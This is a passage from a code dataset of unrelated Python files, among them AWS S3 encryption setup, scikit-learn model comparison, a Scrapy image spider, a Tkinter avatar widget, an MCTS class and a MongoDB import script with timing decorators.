aws:kms\n# for details, check\n\n# Using AES256 for encryption\ntry:\n response = s3.put_bucket_encryption(\n Bucket='testbucket-frompython-1',\n ServerSideEncryptionConfiguration={\n 'Rules': [\n {\n 'ApplyServerSideEncryptionByDefault': {\n 'SSEAlgorithm': 'AES256'\n }\n }\n ]\n }\n )\n print(pprint.pprint(response))\nexcept ClientError as e:\n print(e)\n\n\n# using KMS\n# You will need to create KMS key before using KMS for encryption\n# please note that there is additional cost involved for using KMS\n\ntry:\n response = s3.put_bucket_encryption(\n Bucket='testbucket-frompython-1',\n ServerSideEncryptionConfiguration={\n 'Rules': [\n {\n 'ApplyServerSideEncryptionByDefault': {\n 'SSEAlgorithm': 'aws:kms',\n 'KMSMasterKeyID': 'key id for kms key to be used'\n }\n }\n ]\n }\n )\n print(pprint.pprint(response))\nexcept ClientError as e:\n print(e)\n\n","sub_path":"S3-Buckets/Python/set_bucket_encryption.py","file_name":"set_bucket_encryption.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"313010934","text":"import fileUtilities\nfrom sklearn import preprocessing\n#from sklearn.model_selection import train_test_split\nfrom sklearn import linear_model\nfrom sklearn import ensemble\nfrom sklearn import svm\nfrom sklearn import dummy\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom time import time\nimport random\nimport numpy as np\n\nrandom.seed(100)\nnp.random.seed(100)\n\n#TEST_PERCENT = .20\n\n\ndef getNewModel():\n alphas = [2**x for x in range(-7, 4)]\n #estimators = [1, 2, 4, 10, 20, 50, 100]\n yield dummy.DummyRegressor()\n yield linear_model.LinearRegression()\n yield linear_model.BayesianRidge()\n yield linear_model.RidgeCV(alphas=alphas)\n yield linear_model.ElasticNetCV(alphas=alphas)\n yield linear_model.LassoCV(alphas=alphas)\n yield ensemble.GradientBoostingRegressor(n_estimators=10)\n yield ensemble.AdaBoostRegressor(n_estimators=10)\n #yield ensemble.ExtraTreesRegressor(n_estimators=10)\n yield ensemble.RandomForestRegressor(n_estimators=10)\n #yield svm.LinearSVR()\n ''' can take 5+ mins below ...'''\n #yield svm.SVR(kernel='rbf')\n\n\ndef main():\n train_data, test_data, synthetic_data = fileUtilities.getDataFromCSV()\n trainX = train_data[:, :-1]\n trainY = train_data[:, -1]\n scaler = preprocessing.StandardScaler().fit(trainX)\n trainX = scaler.transform(trainX)\n\n testX = test_data[:, :-1]\n testY = test_data[:, -1]\n testX = scaler.transform(testX)\n #trainX, testX, trainY, testY = train_test_split(x, y, test_size=TEST_PERCENT)\n numFeatures = trainX.shape[1]\n trainSize = trainX.shape[0]\n testSize = testX.shape[0]\n assert trainSize > 50\n assert testSize > 0\n assert numFeatures > 0\n print(\"\\t Features:{} \\t TrainSize={} \\t TestSize={}\".format(numFeatures, trainSize, testSize))\n\n model_list = []\n\n with open(\"ModelResults.csv\", 'w') as outFile:\n headers = \"Full Name,Alpha,Estimators,Duration,TrainSize,TrainMSE,TrainRMSE,TestSize,TestMSE,TestRMSE,R^2 Score\\n\"\n outFile.write(headers)\n\n for model in getNewModel():\n model.name = str(model).split('(')[0]\n trainModel(model, trainX, trainY)\n model_list.append(model)\n print(\"\\n\")\n for model in model_list:\n testModel(model, testX, testY)\n printModelResults(model)\n outFile.write(getOutputModelString(model) + '\\n')\n print(\"\\n\")\n for model in model_list:\n \tmakeIndividualPredictions(model, synthetic_data, scaler)\n\n\ndef trainModel(model, trainData, trainLabels):\n 
print(\"Training with\", model.name, \"...\")\n model.trainSize = trainData.shape[0]\n start = time()\n model.fit(trainData, trainLabels)\n model.trainDuration = time() - start\n trainPredictions = model.predict(trainData)\n model.trainMSE = mean_squared_error(trainLabels, trainPredictions)\n model.trainRMSE = np.sqrt(model.trainMSE)\n\n\ndef testModel(model, testData, testLabels):\n print(\"Testing with\", model.name, \"...\")\n model.testSize = testData.shape[0]\n testPredictions = model.predict(testData)\n model.testMSE = mean_squared_error(testLabels, testPredictions)\n model.score = r2_score(testLabels, testPredictions)\n model.testRMSE = np.sqrt(model.testMSE)\n\n\ndef printModelResults(model):\n name = model.name\n estimators = model.get_params().get('n_estimators', 0)\n if estimators > 0:\n name += \", est=\" + str(estimators)\n dur = \"{0:.3f}\".format(model.trainDuration)\n trainMSE = \"{0:.3f}\".format(model.trainMSE)\n testMSE = \"{0:.3f}\".format(model.testMSE)\n score = \"{0:.3f}\".format(model.score)\n outputs = name, dur, trainMSE, testMSE, score\n print(\"\\t{} took {} secs with MSEs of {} and {} and R^2 of {}\".format(*outputs))\n\n\ndef getOutputModelString(m):\n # headers = \"Name,Alpha,Estimators,Duration,TrainSize,TrainMSE,TestSize,TestMSE,r^2\"\n # alphas = m.get_params().get('alphas', [])\n alpha = getattr(m, 'alpha_', '')\n estimator = m.get_params().get('n_estimators', '')\n #fullName = m.name + str(estimator)\n fullName = m.name\n output = [fullName]\n output.append(alpha)\n output.append(estimator)\n output.append(m.trainDuration)\n output.append(m.trainSize)\n output.append(m.trainMSE)\n output.append(m.trainRMSE)\n output.append(m.testSize)\n output.append(m.testMSE)\n output.append(m.testRMSE)\n output.append(m.score)\n return ','.join([str(val) for val in output])\n\n\ndef makeIndividualPredictions(model, s_data, scaler):\n\ttestPredictions = model.predict(scaler.transform(s_data))\n\tformattedPred = [\"{:0.3f}\".format(member) for member in testPredictions]\n\tprint(\"Testing synthetic data with\", model.name, \"gives the predictions\", formattedPred)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"models/reg_test.py","file_name":"reg_test.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"356512891","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/11/21 8:31\n# @Author : 海心\n# @Site : \n# @File : ImageSpider.py\n# @Software: PyCharm\n# @descri : crawl and download images\nimport json\n\nimport scrapy\n\nfrom ..items import MyImageItem\n\n\nclass ImgSpider(scrapy.Spider):\n name='img'\n index=0\n def start_requests(self):\n yield scrapy.Request(url='https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=&z=&ic=&word=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&s=&se=&tab=&width=&height=&face=&istype=&qc=&nc=&fr=&expermode=&pn=0&rn=30&gsm=1e&1542695319470=')\n def parse(self, response):\n if self.index<=100:\n item=MyImageItem()\n image_urls=[]\n for data in json.loads(response.text)['data']:\n try:\n image_urls.append(data['thumbURL'])\n except:\n pass\n item['image_urls']=image_urls\n item['image_store']='第'+str(int(self.index/30)+1)+'页'\n yield item\n self.index+=30\n yield 
scrapy.Request('https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=&z=&ic=&word=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&s=&se=&tab=&width=&height=&face=&istype=&qc=&nc=&fr=&expermode=&pn='+str(self.index)+'&rn=30&gsm=1e&1542695319470=',meta={'test':'1'})\n","sub_path":"Pythonhomework/Scrapy/myspider/myspider/spiders/ImageSpider.py","file_name":"ImageSpider.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"453325658","text":"from setuptools import setup, find_packages\nimport svnversion\n\nrequires = ['WebError','mock', 'webtest', 'BeautifulSoup4','shortuuid','requests','zope.interface','zope.component']\n\nsetup(name='readable',\n version=svnversion.add_revision('0.0'),\n description='testing and assertion library',\n long_description='',\n classifiers=[\n \"Programming Language :: Python\",\n \"License :: Other/Proprietary License\",\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Testing\",\n ],\n author='Jasper van den Bosch',\n author_email='jasper@ilogue.com',\n url='http://ilogue.com',\n keywords='',\n packages=find_packages(),\n namespace_packages = ['ilogue'],\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n test_suite=\"ilogue.readable.tests.fast\",\n )\n\n## to run the slow test suite, execute\n# env/bin/python setup.py test -q --test-suite ilogue.readable.tests.slow\n\n","sub_path":"pypi_install_script/readable-0.0.post30.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"471914128","text":"from flask import jsonify, session\nfrom dao.choices import Choices\nfrom util.utilities import Utilities\n\n\nclass ChoicesHandler:\n\n @staticmethod\n def getAllChoices():\n try:\n choices = Choices.getChoices()\n result_list = []\n for choice in choices:\n result_list.append(Utilities.to_dict(choice))\n result = {\n \"message\": \"Success!\",\n \"choices\": result_list\n }\n return jsonify(result), 200\n except Exception as e:\n return jsonify(reason=\"Server error\", error=e.__str__()), 500\n\n @staticmethod\n def getChoicesById(cid):\n try:\n choice = Choices.getChoicesById(cid)\n choice_dict = Utilities.to_dict(choice)\n result = {\n \"message\": \"Success!\",\n \"choice\": choice_dict\n }\n return jsonify(result), 200\n except Exception as e:\n return jsonify(reason=\"Server error\", error=e.__str__()), 500\n\n @staticmethod\n def getChoicesByQuizId(qid):\n try:\n choices = Choices.getChoicesByQuizId(qid)\n result_list = []\n for choice in choices:\n result_list.append(Utilities.to_dict(choice))\n result = {\n \"message\": \"Success!\",\n \"choices\": result_list\n }\n return jsonify(result), 200\n except Exception as e:\n return jsonify(reason=\"Server error\", error=e.__str__()), 500\n \n \n\n\n\n \n\n ","sub_path":"backend/handler/choice.py","file_name":"choice.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"86739983","text":"import csv\nimport time\n\ndef stream_messages():\n csv_filename = \"./dataset/sensors.csv\"\n with open(csv_filename, \"r\") as dataset:\n row = csv.reader(dataset, delimiter=\",\")\n for i, data 
in enumerate(row):\n msg = dict(id=data[0],\n sensor1=data[1],\n sensor2=data[2],\n sensor3=data[3],\n sensor4=data[4])\n yield msg\n time.sleep(.01)\n\nif __name__ =='__main__':\n ans = stream_messages()\n for data in ans:\n print(data)\n\n","sub_path":"bidirection_databroker/k.py","file_name":"k.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"198344571","text":"class emp:\n obj_count=0\n def __init__(self,emp_id,salary,desig):\n self.emp_id=emp_id\n self.salary=salary\n self.desig=desig\n emp.obj_count+=1\n\n def display_emp(self):\n print('Employee ID: '+self.emp_id, '\\nSalary: '+self.salary,'\\nDesignation: '+self.desig)\n\n def showobjcount(self):\n print(\"Total Number of Employee %d\" % emp.obj_count)\n\nclass detail(emp):\n def __init__(self,emp_id,salary,desig,name,address):\n # base initializer sets the shared fields and increments obj_count once\n emp.__init__(self,emp_id,salary,desig)\n self.name=name\n self.address=address\n\n def display_emp(self):\n print('Employee ID: '+self.emp_id, '\\nName: '+self.name,'\\nDesignation: '+self.desig, '\\nSalary: '+self.salary,'\\nAddress: '+self.address)\n\n# 'PQR' and 'Sector 62' are placeholder name/address values for this demo\nd=detail('KSPLI100','XYZ','Delhi','PQR','Sector 62')\nemp2=emp('KSPLI101','ABC','Noida')\nemp3=emp('KSPLI102','DEF','Pune')\nemp4=emp('KSPLI103','GHI','Agra')\n\nd.display_emp()\nprint('\\n')\nemp2.display_emp()\nprint('\\n')\nemp3.display_emp()\nprint('\\n')\nemp4.display_emp()\nprint('\\n')\nprint('Total Employee: %d' % emp.obj_count)\n","sub_path":"classemp.py","file_name":"classemp.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"587590671","text":"# agent avatar module\n\nimport cv2\nfrom tkinter import *\nfrom tkStyle import *\nfrom tkinter import ttk\nimport PIL.Image\nimport PIL.ImageTk\n\nfrom avatar_util import Avatar\nfrom avatar_util import Avatar_state\nfrom avatar_util import video_paths as vp\n\n# Avatar widget\nclass Avatar_widget:\n # Constructor\n # Automatically set initial state to neutral\n def __init__(self, parent_frame, max_width = 200, max_height = 150):\n self.avatar_str = StringVar()\n self.state_str = StringVar()\n self.parent_frame = parent_frame\n #Start in neutral state\n self.avatar_str.set(Avatar.FEMALE.value)\n self.state_str.set(Avatar_state.NEUTRAL.value)\n self.curr_avatar = Avatar(self.avatar_str.get())\n self.curr_state = Avatar_state(self.state_str.get())\n # initialize comboboxes\n self.avatar_box = ttk.Combobox(parent_frame, textvariable = self.avatar_str,\n background=StColors.light_grey, foreground=StColors.dark_blue)\n self.avatar_box['values'] = [a.value for a in Avatar]\n self.avatar_box['state'] = \"readonly\"\n self.avatar_box.bind(\"<<ComboboxSelected>>\", self.update_model_event)\n self.state_box = ttk.Combobox(parent_frame, textvariable = self.state_str,\n background=StColors.light_grey, foreground=StColors.dark_blue)\n self.state_box['values'] = [a.value for a in Avatar_state]\n self.state_box['state'] = \"readonly\"\n self.state_box.bind(\"<<ComboboxSelected>>\", self.update_state_event)\n # initialize video object\n self.vid = Avatar_capture(vp[self.curr_avatar][self.curr_state])\n # save max size params\n self.max_width = max_width\n self.max_height = max_height\n # create canvas\n self.canvas = Canvas( parent_frame, width=max_width, height=max_height)\n self.canvas.pack()\n \n # After it is called once, update method will automatically repeat\n self.delay = 15\n self.update()\n \n # Accessor method for state variable. 
Returns StringVar objects\n def get_state_var(self):\n return self.avatar_str, self.state_str\n\n # Generate an event in the parent frame\n # Only call after state is changed through GUI.\n def update_state_event(self, event):\n self.parent_frame.event_generate(\"<>\", when=\"tail\")\n\n def update_model_event(self, event):\n self.parent_frame.event_generate(\"<>\", when=\"tail\")\n\n # Make state control comboboxes visible\n # This method should be called when wizard state is established\n def reveal_controls(self):\n self.avatar_box.pack(side=LEFT)\n self.state_box.pack()\n\n # Returns the size of a scaled down version of the \n # video to fit in the canvas\n # size = (width, height)\n def scale(self, size):\n s = min(self.max_width/size[0],self.max_height/size[1])\n return (int(size[0]*s),int(size[1]*s))\n\n # Update method to check for state updates\n # and choose next frame to display\n def update(self):\n # check for state updates\n state_update = False\n try:\n old_avatar = self.curr_avatar\n old_state = self.curr_state\n self.curr_avatar = Avatar(self.avatar_str.get().lower())\n self.curr_state = Avatar_state(self.state_str.get().lower())\n state_update = old_avatar != self.curr_avatar or old_state != self.curr_state\n except ValueError:\n pass\n # if state is updated, re-initialize Avatar_capture object\n if state_update:\n self.vid = Avatar_capture(vp[self.curr_avatar][self.curr_state]) \n ret, frame = self.vid.get_frame()\n # if get_frame failed, might be end of video so restart.\n if not ret:\n self.vid = Avatar_capture(vp[self.curr_avatar][self.curr_state])\n ret, frame = self.vid.get_frame()\n if ret:\n im = PIL.Image.fromarray(frame)\n im.thumbnail(self.scale(im.size))\n self.photo = PIL.ImageTk.PhotoImage(image = im)\n self.canvas.create_image(0,0, image=self.photo, anchor = NW)\n\n self.parent_frame.after(self.delay, self.update)\n\nclass Avatar_capture:\n def __init__(self, video_source):\n self.vid = cv2.VideoCapture(video_source)\n if not self.vid.isOpened():\n raise ValueError(\"Unable to open avatar video source\", video_source)\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n def get_frame(self):\n if self.vid.isOpened():\n ret, frame = self.vid.read()\n if ret:\n # Return a boolean success flag and the current frame converted to BGR\n return (ret, cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n else:\n return (ret, None)\n else:\n return (ret, None)\n\n def __del__(self):\n if self.vid.isOpened():\n self.vid.release()\n\n# Demo of avatar widget\n\nif __name__ == \"__main__\":\n\n root = Tk()\n root.title(\"Test Avatar\")\n a_frame = ttk.Frame(root)\n avatar = Avatar_widget(a_frame,1000,600) \n avatar.reveal_controls()\n a_frame.pack()\n\n\n root.mainloop()\n","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"402078915","text":"import math\nimport numpy as np\n\nclass mcts():\n def __init__(self, game, nnet):\n self.game = game\n self.nnet = nnet\n self.Qsa = {}\n self.Nsa = {}\n self.Ns = {}\n self.Ps = {}\n self.Es = {}\n self.Vs = {}\n\n def getactionprob(self, oneminusone, temp=1):\n for i in range(100):\n self.search(oneminusone)\n\n s = self.game.stringstring(oneminusone)\n counts = [self.Nsa[(s, a)] if (s, a) in self.Nsa else 0 for a in range(self.game.actionsize())]\n\n if temp == 0:\n bestA = int(np.argmax(counts))\n probs = [0] * len(counts)\n probs[bestA] = 
1\n return probs\n\n counts = [x**(1. / temp) for x in counts]\n probs = [x / float(sum(counts)) for x in counts]\n return probs\n\n def search(self, oneminusone):\n s = self.game.stringstring(oneminusone)\n\n if s not in self.Es:\n self.Es[s] = self.game.ggeutnam(oneminusone, 1)\n if self.Es[s] != 0:\n return -self.Es[s]\n\n if s not in self.Ps:\n # leaf node\n self.Ps[s], v = self.nnet.predict(oneminusone)\n valids = self.game.validmove(oneminusone, 1)\n self.Ps[s] = self.Ps[s] * valids # masking invalid moves\n sum_Ps_s = np.sum(self.Ps[s])\n if sum_Ps_s > 0:\n self.Ps[s] /= sum_Ps_s # renormalize\n else:\n print(\"All valid moves were masked, do workaround.\")\n self.Ps[s] = self.Ps[s] + valids\n self.Ps[s] /= np.sum(self.Ps[s])\n\n self.Vs[s] = valids\n self.Ns[s] = 0\n return -v\n\n valids = self.Vs[s]\n cur_best = -float('inf')\n best_act = -1\n\n for a in range(self.game.actionsize()):\n if valids[a]:\n if (s, a) in self.Qsa:\n u = self.Qsa[(s, a)] + 5 * self.Ps[s][a] * math.sqrt(self.Ns[s]) / (1 + self.Nsa[(s, a)])\n else:\n u = 5 * self.Ps[s][a] * math.sqrt(self.Ns[s] + 1e-8) # Q = 0 ?\n\n if u > cur_best:\n cur_best = u\n best_act = a\n\n a = best_act\n next_s, next_player = self.game.nextstate(oneminusone, 1, a)\n next_s = self.game.oneminusone(next_s, next_player)\n\n v = self.search(next_s)\n\n if (s, a) in self.Qsa:\n self.Qsa[(s, a)] = (self.Nsa[(s, a)] * self.Qsa[(s, a)] + v) / (self.Nsa[(s, a)] + 1)\n self.Nsa[(s, a)] += 1\n\n else:\n self.Qsa[(s, a)] = v\n self.Nsa[(s, a)] = 1\n\n self.Ns[s] += 1\n return -v\n\n","sub_path":"mcts.py","file_name":"mcts.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502816852","text":"import _init_paths\nfrom scorenet import ScoreNet\nfrom keras.utils import np_utils\nfrom config import *\nimport numpy as np\nimport coder\nimport time\nimport cv2\nimport threading\nimport tensorflow as tf \n\n# img_dir = '../img/scorenet/video6_frame090.bmp'\n# Tensorflow graph object\ngraph = tf.get_default_graph()\n# Camera capture related variable\ncap = None\nis_cap_open = False\n\n# model object\nscoring_model = None\n\n# break variable and timer to calculate fps\nframe_index = 0\ntimer = 0.0\nfps_index = 0\n\n# ---------------------------------------------------------------\n# Image objects and predict result\n# ---------------------------------------------------------------\n# 1st\nframe_fetch = None\n\n# 2nd\nframe_process = None\nresult_scoring = None\n\n# 3rd\nshow_frame = None\nscoring_input = None\n\n# scoring_true = np_utils.to_categorical(np.load('../label.npy'),5)\n\nclass fetchImgThread(threading.Thread):\n \"\"\"\n The thread to fetch the image in each duration\n \"\"\"\n def __init__(self):\n threading.Thread.__init__(self)\n\n def start(self):\n threading.Thread.__init__(self)\n threading.Thread.start(self)\n \n def join(self, _sec):\n threading.Thread.join(self, _sec)\n\n def run(self):\n global cap\n global is_cap_open\n global frame_fetch\n _, frame = cap.read()\n is_cap_open = _\n frame_fetch = cv2.resize(frame, (480, 270))\n\nclass deepThread(threading.Thread):\n \"\"\"\n The thread to do the segmentation and classification\n \"\"\"\n def __init__(self):\n threading.Thread.__init__(self)\n\n def start(self):\n threading.Thread.__init__(self)\n threading.Thread.start(self)\n\n def join(self, _sec):\n threading.Thread.join(self, _sec)\n\n def run(self):\n global segment_model\n global frame_process\n global result_segment\n global 
result_scoring\n global graph\n global sess\n global frame_index\n\n with graph.as_default():\n # x_test = np.expand_dims(frame_process, axis=0)\n if frame_index % 3 == 0 and frame_process.any():\n result_scoring = scoring_model.test(\n np.expand_dims(frame_process, 0)\n ) \n \n# # Test\nif __name__ == '__main__':\n \n scoring_model = ScoreNet(save_path='../model/scorenet.h5')\n # scoring_model.compile()\n # cap = cv2.VideoCapture('../video/1.mp4')\n cap = cv2.VideoCapture(video_name) \n\n fetch_thread = fetchImgThread()\n deep_thread = deepThread()\n \n fetch_thread.start()\n fetch_thread.join(1)\n # Pass the input object and clean the previous status\n frame_process = np.copy(frame_fetch)\n frame_fetch = None\n \n # Grab 2nd frame\n fetch_thread.start()\n deep_thread.start()\n fetch_thread.join(5)\n deep_thread.join(5)\n \n show_frame = np.copy(frame_process)\n scoring_input = np.copy(result_scoring)\n result_scoring = None\n frame_process = np.copy(frame_fetch)\n frame_fetch = None\n \n while cap.isOpened():\n _time = time.time()\n\n fetch_thread.start()\n deep_thread.start()\n fetch_thread.join(5)\n deep_thread.join(5)\n cv2.imshow('test',frame_process)\n cv2.imshow('scoring', coder.decodeByVector(show_frame, scoring_input))\n \n # Pring fps\n if timer > 1.0:\n print (\"fps: \", fps_index / timer)\n fps_index = 0\n timer = 0\n\n # judge if we want to break\n if (cv2.waitKey(1) & 0xFF == ord('q')):\n break\n# if not unicode(video_name).isnumeric():\n# if frame_index > break_frame_index:\n# break\n\n # Pass the input object and clean the previous status\n show_frame = np.copy(frame_process)\n scoring_input = np.copy(result_scoring)\n # print('Scoring:',scoring_input)\n # loss,accuracy = scoring_model.evaluate(scoring_true,scoring_input)\n # print('test loss: ', loss)\n # print('test accuracy: ', accuracy)\n\n # Clear the scoring result if predict ScoreNet in next frame\n if frame_index % 3 == 2:\n result_scoring = None\n frame_process = np.copy(frame_fetch)\n frame_fetch = None\n\n # Update fps computation variable\n frame_index += 1\n fps_index += 1\n timer += (time.time() - _time)\n \n cap.release()\n \n # model = ScoreNet(save_path='../model/scorenet.h5')\n # x_test = np.expand_dims(cv2.imread(img_dir), axis=0)\n # _time = time.time()\n # prediction = model.test(x_test)\n # print ('time comsumption: ', time.time() - _time)\n # # Show the test result\n # prediction = prediction.astype(int)\n\n # res = coder.decodeByVector(x_test[0], prediction)\n # cv2.imshow('show', res)\n # cv2.waitKey(0)\n\n","sub_path":"test/scorenet_test.py","file_name":"scorenet_test.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85896847","text":"\"\"\"\"\nLesson 5. 
Create DB using mongodb api\n\"\"\"\n\n# pylint: disable= W1203, R0914, C0103, W0703, W0612, R0201\nimport logging\nimport csv\nimport os\nimport time\nfrom pymongo import MongoClient # high level api\n\n\nLOG_FORMAT = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\nFORMATTER = logging.Formatter(LOG_FORMAT)\n\nFILE_HANDLER = logging.FileHandler('db.log')\nFILE_HANDLER.setLevel(logging.INFO)\nFILE_HANDLER.setFormatter(FORMATTER)\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.INFO)\nLOGGER.addHandler(FILE_HANDLER)\n\n\nclass MongoDBConnection():\n \"\"\"\n Class to start MongoDB Connection\n \"\"\"\n\n def __init__(self, host='127.0.0.1', port=27017):\n \"\"\" be sure to use the ip address not name for local windows\"\"\"\n self.host = host\n self.port = port\n self.connection = None\n\n def __enter__(self):\n self.connection = MongoClient(self.host, self.port)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.close()\n\n\ndef get_time(func):\n '''\n method to get time for each function\n '''\n def calc_time(*args, **kwargs):\n start = time.time()\n results = func(*args, **kwargs)\n total_time = time.time() - start\n with open(\"timings.txt\", \"a+\") as file:\n file.write(f'{func.__name__} took {total_time} seconds to run\\n')\n return results\n return calc_time\n\n\nclass Timed(type):\n \"\"\" Meta class to add timing \"\"\"\n def __new__(cls, clsname, bases, clsdict):\n for name, value in clsdict.items():\n if callable(value):\n clsdict[name] = get_time(value)\n\n return super(Timed, cls).__new__(cls, clsname, bases, clsdict)\n\n\nclass database(metaclass=Timed):\n '''\n class to make database and add data to it\n '''\n def import_data(\n self,\n directory_name,\n product_file,\n customer_file,\n rentals_file):\n \"\"\"\n method to import the csv files that will be added to the db\n \"\"\"\n LOGGER.info(\"starting MongoDBConnection\")\n mongo = MongoDBConnection()\n\n with mongo:\n\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n\n # collection in database\n products = db[\"products\"]\n customers = db[\"customers\"]\n rentals = db[\"rentals\"]\n db.products.drop()\n db.customers.drop()\n db.rentals.drop()\n\n LOGGER.info(\"importing data\")\n product_ip = database.read_data(self, directory_name, product_file)\n customer_ip = database.read_data(\n self, directory_name, customer_file)\n rentals_ip = database.read_data(self, directory_name, rentals_file)\n\n product_results = database.add_many_ip(self, products, product_ip)\n customer_results = database.add_many_ip(\n self, customers, customer_ip)\n rental_results = database.add_many_ip(self, rentals, rentals_ip)\n\n import_count = (\n db.products.count_documents({}),\n db.customers.count_documents({}),\n db.rentals.count_documents({})\n )\n\n LOGGER.info(f'succesful product imports = {import_count[0]} to db')\n LOGGER.info(f'succesful customer imports = {import_count[1]} to db')\n LOGGER.info(f'succesful rental imports = {import_count[2]} to db')\n\n error_count = (product_results, customer_results, rental_results)\n LOGGER.info(f'product import errors = {error_count[0]} to db')\n LOGGER.info(f'customer import errors = {error_count[1]} to db')\n LOGGER.info(f'rental import errors = {error_count[2]} to db')\n\n return import_count, error_count\n\n def read_data(self, directory_name, file_name):\n \"\"\"\n method to read in the csv files\n \"\"\"\n LOGGER.info(f'reading {file_name} data from {directory_name}')\n ip_list = []\n\n try:\n with 
open(directory_name + file_name) as csv_file:\n reader = csv.reader(csv_file)\n header = next(reader, None)\n header[0] = header[0].replace(\"\\ufeff\", \"\")\n\n for row in reader:\n temp_dict = {}\n for index, value in enumerate(header):\n temp_dict[value] = row[index]\n ip_list.append(temp_dict)\n LOGGER.info(\"successfully read in data\")\n\n except Exception as error:\n LOGGER.info(f'could not read data due to {error}')\n\n return ip_list\n\n def add_many_ip(self, collection_name, collection_ip):\n \"\"\"\n method to add the data to the collection\n \"\"\"\n\n try:\n collection_name.insert_many(collection_ip)\n LOGGER.info(f'no errors importing to {collection_name} ')\n error = 0\n return error\n except Exception as error:\n LOGGER.info(\n f'add_many_ip error of {error} for to {collection_name}')\n error = 1\n return error\n\n def show_available_products(self):\n \"\"\"\n Method to show available products\n \"\"\"\n mongo = MongoDBConnection()\n LOGGER.info(\"starting show_available_products method\")\n with mongo:\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n avail_products_dict = {}\n query = {'quantity_available': {'$gt': '1'}}\n for query_results in db.products.find(query):\n key = query_results[\"product_id\"]\n values = {\n \"description\": query_results[\"description\"],\n \"product_type\": query_results[\"product_type\"],\n \"quantity_available\": query_results[\"quantity_available\"]\n }\n temp_dict = {key: values}\n avail_products_dict.update(temp_dict)\n LOGGER.info(f'available products = {avail_products_dict}')\n return avail_products_dict\n\n def show_rentals(self, product_id):\n \"\"\"\n Method to show available products\n \"\"\"\n mongo = MongoDBConnection()\n LOGGER.info(\"starting show_rentals method\")\n with mongo:\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n show_rentals_dict = {}\n query = {'product_id': product_id}\n for query_results in db.rentals.find(query):\n query_2 = {'user_id': query_results['user_id']}\n for query_results_2 in db.customers.find(query_2):\n key = query_results_2['user_id']\n value = {\n 'name': query_results_2['name'],\n 'address': query_results_2['address'],\n 'phone_number': query_results_2['phone_number'],\n 'email': query_results_2['email']\n }\n temp_dict = {key: value}\n show_rentals_dict.update(temp_dict)\n LOGGER.info(\n f'showing rentals that match \"{product_id}\" = {show_rentals_dict}')\n\n return show_rentals_dict\n\n def drop_data(self):\n \"\"\"\n method to drop the data from db\n \"\"\"\n mongo = MongoDBConnection()\n LOGGER.info(\"starting drop data method\")\n with mongo:\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n db.products.drop()\n db.customers.drop()\n db.rentals.drop()\n\n\ndef main():\n \"\"\"\n main used to call other methods\n \"\"\"\n cwd = os.path.abspath(os.path.join(os.path.dirname(__file__)))\n db = database()\n import_count, error_count = db.import_data(\n cwd + \"/\", \"product.csv\", \"customers.csv\", \"rental.csv\")\n db.show_available_products()\n db.show_rentals(\"prd002\")\n db.drop_data()\n db2 = database()\n import_count, error_count = db2.import_data(\n cwd + \"/\", \"product.1.csv\", \"customers.1.csv\", \"rental.1.csv\")\n db2.show_available_products()\n db2.show_rentals(\"prd002\")\n db2.drop_data()\n db3 = database()\n import_count, error_count = db3.import_data(\n cwd + \"/\", \"product.2.csv\", \"customers.2.csv\", \"rental.2.csv\")\n db3.show_available_products()\n db3.show_rentals(\"prd002\")\n 
